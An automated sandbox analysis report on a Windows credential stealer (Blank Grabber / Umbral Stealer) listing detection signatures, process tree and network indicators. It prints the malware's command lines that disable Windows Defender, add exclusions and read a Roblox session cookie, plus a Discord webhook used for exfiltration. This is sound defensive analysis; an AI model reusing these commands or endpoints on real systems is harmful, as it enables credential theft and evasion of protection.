Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
resembleC2.exe

Overview

General Information

Sample name:resembleC2.exe
Analysis ID:1589390
MD5:4c8044c83f60465eae3cc16d7c858085
SHA1:bc837ba36a8f244283483210215a11607f05fb63
SHA256:331faea175ced9239aa38c09f75cf1cba4a331461268315b76c94bb7c7a4b8d8
Tags:exeuser-zhuzhu0009
Infos:

Detection

Blank Grabber, Umbral Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Blank Grabber
Yara detected Umbral Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Drops PE files to the startup folder
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies the hosts file
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Uses attrib.exe to hide files
Uses ping.exe to check the status of other devices and networks
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • resembleC2.exe (PID: 1124 cmdline: "C:\Users\user\Desktop\resembleC2.exe" MD5: 4C8044C83F60465EAE3CC16D7C858085)
    • 6z2guuz0ldkdgc1o.exe (PID: 2828 cmdline: "C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe" MD5: 8C7D2F0A936DBE6D0899D40171FFB668)
    • MoonHub.exe (PID: 1784 cmdline: "C:\Users\user\AppData\Local\Temp\MoonHub.exe" MD5: F70B5E56A09AF292D4E909C547F9C8C0)
      • WMIC.exe (PID: 3652 cmdline: "wmic.exe" csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • conhost.exe (PID: 3924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • attrib.exe (PID: 5008 cmdline: "attrib.exe" +h +s "C:\Users\user\AppData\Local\Temp\MoonHub.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
        • conhost.exe (PID: 5844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1492 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MoonHub.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 5336 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • powershell.exe (PID: 6700 cmdline: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4696 cmdline: "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2220 cmdline: "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WMIC.exe (PID: 428 cmdline: "wmic.exe" os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • conhost.exe (PID: 6588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WMIC.exe (PID: 6324 cmdline: "wmic.exe" computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • conhost.exe (PID: 1492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WMIC.exe (PID: 6544 cmdline: "wmic.exe" csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • conhost.exe (PID: 5400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5960 cmdline: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WMIC.exe (PID: 1712 cmdline: "wmic" path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • conhost.exe (PID: 5732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5632 cmdline: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\AppData\Local\Temp\MoonHub.exe" && pause MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • PING.EXE (PID: 1524 cmdline: ping localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
  • OpenWith.exe (PID: 6628 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
  • cleanup

Malware Configuration

Threatname: Umbral Stealer

{"C2 url": "https://discord.com/api/webhooks/1326652489054818346/f_cBTMEYAkXYcTbEkW-MUwYrefMORTfuoofsZ5ymJ5yR8BQpohmaCuB-PwAuIP1xAUKw", "Version": "v1.3"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\MoonHub.exeJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
    C:\Users\user\AppData\Local\Temp\MoonHub.exeJoeSecurity_UmbralStealerYara detected Umbral StealerJoe Security
      C:\Users\user\AppData\Local\Temp\MoonHub.exeINDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDeviceDetects executables attemping to enumerate video devices using WMIditekSHen
      • 0x31f28:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
      • 0x320ae:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
      • 0x3214a:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
      C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\gqnbO.scrJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\gqnbO.scrJoeSecurity_UmbralStealerYara detected Umbral StealerJoe Security
          Click to see the 1 entries

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000005.00000002.2902392061.000001565AA5C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
            00000000.00000002.2183781246.0000000013008000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
              00000000.00000002.2183781246.0000000013008000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UmbralStealerYara detected Umbral StealerJoe Security
                00000005.00000000.2180364705.00000156585B2000.00000002.00000001.01000000.00000008.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                  00000005.00000000.2180364705.00000156585B2000.00000002.00000001.01000000.00000008.sdmpJoeSecurity_UmbralStealerYara detected Umbral StealerJoe Security
                    Click to see the 8 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    0.2.resembleC2.exe.13020e48.1.unpackJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                      0.2.resembleC2.exe.13020e48.1.unpackJoeSecurity_UmbralStealerYara detected Umbral StealerJoe Security
                        0.2.resembleC2.exe.13020e48.1.unpackINDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDeviceDetects executables attemping to enumerate video devices using WMIditekSHen
                        • 0x30128:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
                        • 0x302ae:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
                        • 0x3034a:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
                        5.0.MoonHub.exe.156585b0000.0.unpackJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                          5.0.MoonHub.exe.156585b0000.0.unpackJoeSecurity_UmbralStealerYara detected Umbral StealerJoe Security
                            Click to see the 4 entries

                            Sigma Signatures

                            System Summary

                            barindex
                            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MoonHub.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MoonHub.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\MoonHub.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\MoonHub.exe, ParentProcessId: 1784, ParentProcessName: MoonHub.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MoonHub.exe', ProcessId: 1492, ProcessName: powershell.exe
                            Sigma detected: Powershell Defender Disable Scan Feature
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, CommandLine: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\MoonHub.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\MoonHub.exe, ParentProcessId: 1784, ParentProcessName: MoonHub.exe, ProcessCommandLine: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, ProcessId: 6700, ProcessName: powershell.exe
                            Sigma detected: Suspicious Script Execution From Temp Folder
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MoonHub.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MoonHub.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\MoonHub.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\MoonHub.exe, ParentProcessId: 1784, ParentProcessName: MoonHub.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MoonHub.exe', ProcessId: 1492, ProcessName: powershell.exe
                            Sigma detected: Suspicious Startup Folder Persistence
                            Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\MoonHub.exe, ProcessId: 1784, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\gqnbO.scr
                            Sigma detected: Powershell Defender Exclusion
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MoonHub.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MoonHub.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\MoonHub.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\MoonHub.exe, ParentProcessId: 1784, ParentProcessName: MoonHub.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MoonHub.exe', ProcessId: 1492, ProcessName: powershell.exe
                            Sigma detected: SCR File Write Event
                            Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\MoonHub.exe, ProcessId: 1784, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\gqnbO.scr
                            Sigma detected: Startup Folder File Write
                            Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\MoonHub.exe, ProcessId: 1784, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\gqnbO.scr
                            Sigma detected: Suspicious Screensaver Binary File Creation
                            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\MoonHub.exe, ProcessId: 1784, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\gqnbO.scr
                            Sigma detected: Non Interactive PowerShell Process Spawned
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MoonHub.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MoonHub.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\MoonHub.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\MoonHub.exe, ParentProcessId: 1784, ParentProcessName: MoonHub.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MoonHub.exe', ProcessId: 1492, ProcessName: powershell.exe

                            Suricata Signatures

                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-01-12T07:11:29.966839+010020455931A Network Trojan was detected192.168.2.550018162.159.135.232443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-01-12T07:11:02.890379+010028033053Unknown Traffic192.168.2.549947208.95.112.180TCP

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus / Scanner detection for submitted sample
                            Source: resembleC2.exeAvira: detected
                            Antivirus detection for dropped file
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeAvira: detection malicious, Label: HEUR/AGEN.1307507
                            Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\gqnbO.scrAvira: detection malicious, Label: HEUR/AGEN.1307507
                            Found malware configuration
                            Source: 0.2.resembleC2.exe.13020e48.1.unpackMalware Configuration Extractor: Umbral Stealer {"C2 url": "https://discord.com/api/webhooks/1326652489054818346/f_cBTMEYAkXYcTbEkW-MUwYrefMORTfuoofsZ5ymJ5yR8BQpohmaCuB-PwAuIP1xAUKw", "Version": "v1.3"}
                            Multi AV Scanner detection for dropped file
                            Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\gqnbO.scrReversingLabs: Detection: 76%
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeReversingLabs: Detection: 34%
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeReversingLabs: Detection: 76%
                            Multi AV Scanner detection for submitted file
                            Source: resembleC2.exeReversingLabs: Detection: 57%
                            Source: resembleC2.exeVirustotal: Detection: 58%Perma Link
                            AI detected suspicious sample
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                            Machine Learning detection for dropped file
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeJoe Sandbox ML: detected
                            Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\gqnbO.scrJoe Sandbox ML: detected
                            Machine Learning detection for sample
                            Source: resembleC2.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeCode function: 5_2_00007FF8490536FE CryptUnprotectData,5_2_00007FF8490536FE
                            Source: resembleC2.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: unknownHTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.5:50018 version: TLS 1.2
                            Source: resembleC2.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                            Networking

                            barindex
                            Suricata IDS alerts for network traffic
                            Source: Network trafficSuricata IDS: 2045593 - Severity 1 - ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST) : 192.168.2.5:50018 -> 162.159.135.232:443
                            C2 URLs / IPs found in malware configuration
                            Source: Malware configuration extractorURLs: https://discord.com/api/webhooks/1326652489054818346/f_cBTMEYAkXYcTbEkW-MUwYrefMORTfuoofsZ5ymJ5yR8BQpohmaCuB-PwAuIP1xAUKw
                            Uses ping.exe to check the status of other devices and networks
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost
                            Source: global trafficTCP traffic: 192.168.2.5:49704 -> 18.153.198.123:11057
                            Source: global trafficTCP traffic: 192.168.2.5:50024 -> 3.78.28.71:11057
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.com
                            Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                            Source: Joe Sandbox ViewIP Address: 3.78.28.71 3.78.28.71
                            Source: Joe Sandbox ViewIP Address: 18.153.198.123 18.153.198.123
                            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                            Source: unknownDNS query: name: ip-api.com
                            Source: unknownDNS query: name: ip-api.com
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49947 -> 208.95.112.1:80
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.com
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
                            Source: global trafficDNS traffic detected: DNS query: coprophile.bounceme.net
                            Source: global trafficDNS traffic detected: DNS query: 0.tcp.eu.ngrok.io
                            Source: global trafficDNS traffic detected: DNS query: ip-api.com
                            Source: global trafficDNS traffic detected: DNS query: discord.com
                            Source: unknownHTTP traffic detected: POST /api/webhooks/1326652489054818346/f_cBTMEYAkXYcTbEkW-MUwYrefMORTfuoofsZ5ymJ5yR8BQpohmaCuB-PwAuIP1xAUKw HTTP/1.1Accept: application/jsonUser-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17Content-Type: application/json; charset=utf-8Host: discord.comContent-Length: 938Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 12 Jan 2025 06:11:29 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1736662291x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W2qTdgF1Cr38SEOGT23HWMs6OeP2AjvXe7equFCOi%2Fg5%2BwmV0tBGXLwLfu%2FlHCjDB9G1NO7lVFjLmxZQ05gmsEGqFdLEJMQ6q2VAgIo4M3DjVLI%2FrsnCdsgugyIE"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=1a2e9aa9e0e9b0ac8198ee6fe4f49730073d799f-1736662289; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=ob.OhzKQJmx9WAujruvt5OUCQLs9zf27vN7AvFbXxI4-1736662289919-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 900afd4ebf5178e7-EWR{"message": "Unknown Webhook", "code": 10015}
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 12 Jan 2025 06:11:31 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1736662292x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AKVv4Q0YGUof%2FDk4xwgppxhE%2BNTAm7CbOF7VlJb5z13OICd9Uoh6%2B8tuWasMP7cVdvDmMG32JN%2BZYm3HS0BCtGI%2B3a2vln4sPZ86subu3v8Vv%2BolQgP4lYHf2nNG"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Server: cloudflareCF-RAY: 900afd53ae194308-EWR{"message": "Unknown Webhook", "code": 10015}
                            Source: powershell.exe, 0000001C.00000002.2845407848.000001994D12F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565AAF4000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe, 00000005.00000002.2902392061.000001565AB1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://discord.com
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565AA5C000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe, 00000005.00000002.2902392061.000001565A435000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                            Source: resembleC2.exe, 00000000.00000002.2183781246.0000000013008000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe, 00000005.00000002.2902392061.000001565AA5C000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe, 00000005.00000000.2180364705.00000156585B2000.00000002.00000001.01000000.00000008.sdmp, MoonHub.exe.0.dr, gqnbO.scr.5.drString found in binary or memory: http://ip-api.com/json/?fields=225545
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565AA5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545P
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A435000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
